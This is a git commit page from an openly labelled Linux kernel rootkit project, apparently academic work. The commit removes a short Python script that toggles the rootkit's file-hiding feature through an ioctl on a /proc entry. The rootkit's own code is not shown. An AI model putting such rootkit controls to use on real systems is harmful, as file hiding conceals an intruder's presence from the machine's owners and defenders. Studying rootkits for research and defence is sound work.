linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit e66773fe3409ba19d96392484da39deb9eb23097
parent 09f487de7866e24995d29dd8ce99b23c369e7d65
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 12:18:32 +0100

removes now redundant filehide toggle script

Diffstat:
Dtoggle_filehiding.py | 12------------
1 file changed, 0 insertions(+), 12 deletions(-)

diff --git a/toggle_filehiding.py b/toggle_filehiding.py @@ -1,12 +0,0 @@ -#!/usr/bin/env python3 - -import fcntl -import os -import sys - -IOCTL_FILEHIDE = 0x80084001 - -if __name__ == "__main__": - proc_file = "/proc/g7rkp" - proc_fd = os.open(proc_file, os.O_RDWR) - fcntl.ioctl(proc_fd, IOCTL_FILEHIDE, b"FILEHIDE");